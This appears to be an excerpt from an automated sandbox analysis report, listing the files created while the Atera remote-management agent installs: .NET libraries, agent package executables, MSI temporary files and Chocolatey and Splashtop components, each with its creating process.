                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Pubnub.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7BC1.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC4E9.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA1C8.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77D8.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 442ad8.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI77D8.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC41B.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC499.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E58.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6CA1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI46E3.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 442ada.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI31B4.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6CA1.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAB51.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBDF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dllJump to dropped file
